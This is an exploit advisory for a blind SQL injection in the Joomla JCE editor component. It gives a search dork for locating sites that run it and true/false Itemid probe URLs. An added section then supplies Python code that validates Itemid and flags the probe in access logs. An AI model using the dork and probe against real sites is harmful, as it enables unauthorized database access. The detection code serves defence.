===================================================================

joomlacontenteditor (com_jce) Blind SQL Injection Vulnerability

===================================================================

Software: joomlacontenteditor (com_jce)

Vendor: www.joomlacontenteditor.net

Vuln Type: Blind SQL Injection

Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)

Author: eidelweiss

contact: eidelweiss[at]windowslive[dot]com

Home: www.eidelweiss.info

Dork: inurl:"/index.php?option=com_jce"

References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html

===================================================================

Description:
JCE makes creating and editing Joomla!® content easy. Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...

===================================================================

exploit & p0c

[!] index.php?option=com_jce&Itemid=[valid Itemid]

Example p0c

[!] http://host/index.php?option=com_jce&Itemid=8 <= True

[!] http://host/index.php?option=com_jce&Itemid=-8 <= False

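The p0c above relies on one thing: the Itemid value is taken from the query string and reaches a database query without being reduced to a plain positive integer, so a true request (Itemid=8) and a false request (Itemid=-8) produce distinguishable pages. The following is an added example (not part of this advisory and not JCE project code) showing the defender's side of that: a strict Itemid validator of the kind a fix would apply before any query (in PHP the equivalent is casting to int and rejecting non-positive results), plus a detection pass over constructed web-server access-log lines that flags com_jce requests whose Itemid is not a positive integer, which catches the negative-value probe from the p0c. The log format, the sample lines, the IP addresses and all function names are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Joomla menu item ids (Itemid) are positive integers. Anything that is not
# a bare positive integer is rejected before it could reach a query.
# Hypothetical helper written for this example.
ITEMID_RE = re.compile(r"^[1-9][0-9]*$")


def validate_itemid(raw):
    """Return Itemid as an int, or None if it is not a plain positive integer."""
    if raw is None:
        return None
    raw = raw.strip()
    if not ITEMID_RE.match(raw):
        return None
    return int(raw)


# Constructed access-log layout (client, ident, user, [timestamp], "request", status, bytes).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_request(line):
    """Split one log line into its fields; None if the line does not fit the layout."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_jce_requests(lines):
    """Return (client_ip, raw_itemid, reason) for every com_jce request whose Itemid is invalid."""
    findings = []
    for line in lines:
        req = parse_request(line)
        if req is None:
            continue
        query = parse_qs(urlsplit(req["path"]).query, keep_blank_values=True)
        # Only requests routed to the JCE component are in scope here.
        if query.get("option", [None])[0] != "com_jce":
            continue
        for raw in query.get("Itemid", []):
            if validate_itemid(raw) is None:
                findings.append((req["ip"], raw, "Itemid is not a positive integer"))
    return findings


# Constructed sample log: a normal request, the negative-value probe from the
# p0c, an out-of-scope component, and a non-numeric value.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2011:12:00:01 +0000] "GET /index.php?option=com_jce&Itemid=8 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Apr/2011:12:00:03 +0000] "GET /index.php?option=com_jce&Itemid=-8 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [10/Apr/2011:12:00:05 +0000] "GET /index.php?option=com_content&Itemid=-8 HTTP/1.1" 200 3000',
    '203.0.113.5 - - [10/Apr/2011:12:00:07 +0000] "GET /index.php?option=com_jce&Itemid=8abc HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, raw, reason in suspicious_jce_requests(SAMPLE_LOG):
        print(f"{ip}\tItemid={raw!r}\t{reason}")
```

Two design choices worth noting: the validator rejects leading zeros and whitespace-padded variants as well as negatives, because a menu id that is not literally a positive integer has no legitimate reason to appear in a request; and the detector is scoped to option=com_jce to match this advisory, but dropping that check makes it a site-wide rule, since the same reasoning holds for Itemid on every Joomla component.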
====================================================================

Nothing Impossible In This World Even Nobody's Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================